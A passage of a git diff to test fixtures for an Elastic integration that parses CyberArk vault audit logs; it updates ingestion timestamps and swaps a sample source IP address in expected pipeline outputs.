BasicValue: True; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"BLService Audit Record\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "385", "kind": "event" @@ -186,7 +186,7 @@ "event": { "severity": 2, "action": "blservice audit record", - "ingested": "2021-06-09T10:24:35.024619600Z", + "ingested": "2021-12-09T13:37:03.416591300Z", "original": "\u003c5\u003e1 2021-03-11T19:40:52Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 11:40:52\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T19:40:52Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e385\u003c/MessageID\u003e\\n \u003cDesc\u003eBLService Audit Record\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eBLService Audit Record\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: True; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eBLService Audit Record\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 11:40:52\",\"IsoTimestamp\":\"2021-03-11T19:40:52Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"385\",\"Desc\":\"BLService Audit Record\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"BLService Audit Record\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: True; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"BLService Audit Record\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "385", "kind": "event" @@ -250,7 +250,7 @@ "event": { "severity": 2, "action": "blservice audit record", - "ingested": "2021-06-09T10:24:35.024622Z", + "ingested": "2021-12-09T13:37:03.416596700Z", "original": "\u003c5\u003e1 2021-03-14T12:04:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:04:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:04:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e385\u003c/MessageID\u003e\\n \u003cDesc\u003eBLService Audit Record\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eBLService Audit Record\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: False; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eBLService Audit Record\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:04:35\",\"IsoTimestamp\":\"2021-03-14T12:04:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"385\",\"Desc\":\"BLService Audit Record\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"BLService Audit Record\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 90; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: False; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"BLService Audit Record\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "385", "kind": "event" @@ -314,7 +314,7 @@ "event": { "severity": 2, "action": "blservice audit record", - "ingested": "2021-06-09T10:24:35.024624300Z", + "ingested": "2021-12-09T13:37:03.416602300Z", "original": "\u003c5\u003e1 2021-03-14T12:04:53Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:04:53\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:04:53Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e385\u003c/MessageID\u003e\\n \u003cDesc\u003eBLService Audit Record\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eBLService Audit Record\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 500; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: False; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eBLService Audit Record\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:04:53\",\"IsoTimestamp\":\"2021-03-14T12:04:53Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"385\",\"Desc\":\"BLService Audit Record\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"BLService Audit Record\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\u003cVaultCommandAuditApplicativeHeader z:Id=\\\"1\\\" xmlns=\\\"CyberArk.AppServices.LogicContainer.Audit\\\" xmlns:i=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:z=\\\"http://schemas.microsoft.com/2003/10/Serialization/\\\"\u003e\u003cRuleAuditComponent z:Id=\\\"2\\\"\u003e\u003cAction z:Id=\\\"3\\\"\u003eUpdate\u003c/Action\u003e\u003cContainerName z:Id=\\\"4\\\"/\u003e\u003cIsAdvanced\u003etrue\u003c/IsAdvanced\u003e\u003cNewValue z:Id=\\\"5\\\"\u003eEnforceExclusiveAccess: False; EnforceOneTimePasswords: False; AllowOPMAccess: True; RecordSessions: True; EnforceExpirationPeriod: 500; EnforceVerificationPeriod: 7; AuditRetentionPeriod: 90; PSMEnabled: False; RequireReason: AllowFreeTextReason: True, BasicValue: False; AllowTransparentConnection: AllowViewingPasswords: True, BasicValue: True; DualControl: BasicValue: False, DualControlRequireMultilevelApproval: False, DualControlRequireManagerialApproval: False, DualControlRequiredConfirmers: 1\u003c/NewValue\u003e\u003cOldValue z:Id=\\\"6\\\"\u003eN/A\u003c/OldValue\u003e\u003cPropertyName z:Id=\\\"7\\\"\u003eMaster Policy\u003c/PropertyName\u003e\u003c/RuleAuditComponent\u003e\u003c/VaultCommandAuditApplicativeHeader\u003e\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"BLService Audit Record\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "385", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log index 283cc15f94e..6cfba6b84db 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log @@ -1,2 +1,2 @@ -<7>1 2021-03-10T18:42:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:42:36","IsoTimestamp":"2021-03-10T18:42:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"4","Desc":"User Authentication","Severity":"Error","Issuer":"Administrator","Action":"User Authentication","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"User Authentication","GatewayStation":""}}} +<7>1 2021-03-10T18:42:36Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:42:36","IsoTimestamp":"2021-03-10T18:42:36Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"4","Desc":"User Authentication","Severity":"Error","Issuer":"Administrator","Action":"User Authentication","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"User Authentication","GatewayStation":""}}} <7>1 2021-03-11T18:03:43Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:03:43\n 2021-03-11T18:03:43Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 4\n User Authentication\n Error\n Administrator\n User Authentication\n \n \n \n \n 127.0.0.1\n \n \n \n \n \n User Authentication\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:03:43","IsoTimestamp":"2021-03-11T18:03:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"4","Desc":"User Authentication","Severity":"Error","Issuer":"Administrator","Action":"User Authentication","SourceUser":"","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"User Authentication","GatewayStation":"10.0.1.20"}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log-expected.json index 13c03f2cb83..950d83a79c9 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-4-user-authentication.log-expected.json @@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -40,7 +28,7 @@ "Administrator" ], "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -48,7 +36,7 @@ "severity": "Error", "rfc5424": true, "iso_timestamp": "2021-03-10T18:42:36Z", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "User Authentication", "message": "User Authentication", "issuer": "Administrator", @@ -61,8 +49,8 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:35.129865Z", - "original": "\u003c7\u003e1 2021-03-10T18:42:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:42:36\",\"IsoTimestamp\":\"2021-03-10T18:42:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"4\",\"Desc\":\"User Authentication\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"User Authentication\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"User Authentication\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:03.891416600Z", + "original": "\u003c7\u003e1 2021-03-10T18:42:36Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:42:36\",\"IsoTimestamp\":\"2021-03-10T18:42:36Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"4\",\"Desc\":\"User Authentication\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"User Authentication\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"User Authentication\",\"GatewayStation\":\"\"}}}", "code": "4", "kind": "event", "action": "authentication_failure", @@ -137,7 +125,7 @@ }, "event": { "severity": 7, - "ingested": "2021-06-09T10:24:35.129876300Z", + "ingested": "2021-12-09T13:37:03.891424700Z", "original": "\u003c7\u003e1 2021-03-11T18:03:43Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:03:43\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:03:43Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e4\u003c/MessageID\u003e\\n \u003cDesc\u003eUser Authentication\u003c/Desc\u003e\\n \u003cSeverity\u003eError\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUser Authentication\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e127.0.0.1\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUser Authentication\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.0.1.20\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:03:43\",\"IsoTimestamp\":\"2021-03-11T18:03:43Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"4\",\"Desc\":\"User Authentication\",\"Severity\":\"Error\",\"Issuer\":\"Administrator\",\"Action\":\"User Authentication\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"User Authentication\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "4", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-411-window-title.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-411-window-title.log-expected.json index 846915fcf6f..2bf4a12105e 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-411-window-title.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-411-window-title.log-expected.json @@ -95,7 +95,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:35.179654900Z", + "ingested": "2021-12-09T13:37:04.116666Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e411\u003c/MessageID\u003e\\n \u003cDesc\u003eWindow Title\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eadm2\u003c/Issuer\u003e\\n \u003cAction\u003eWindow Title\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eWindows\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-WIN-SERVER-LOCAL-dbserver.cyberark.local-Administrator2\u003c/File\u003e\\n \u003cStation\u003e10.2.0.5\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=shutdown.exe, Shutdown Event Tracker;ConnectionComponentId=PSM-RDP;DstHost=dbserver.cyberark.local;ProcessId=4144;ProcessName=shutdown.exe;Protocol=RDP;PSMID=PSMServer_88f6598;RDPOffset=218B;SessionID=a1f46060-1de4-4f56-a8ba-71fdf3140ac1;SrcHost=10.2.0.6;User=Administrator2;VIDOffset=12T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eWindow Title\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"WIN-SERVER-LOCAL\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"Administrator2\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"dbserver.cyberark.local\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LogonDomain\\\" Value=\\\"DBServer\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"SequenceID\\\" Value=\\\"1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessReconciliation\\\" Value=\\\"1604944215\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Customer\\\" Value=\\\"EvilCorp\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"411\",\"Desc\":\"Window Title\",\"Severity\":\"Info\",\"Issuer\":\"adm2\",\"Action\":\"Window 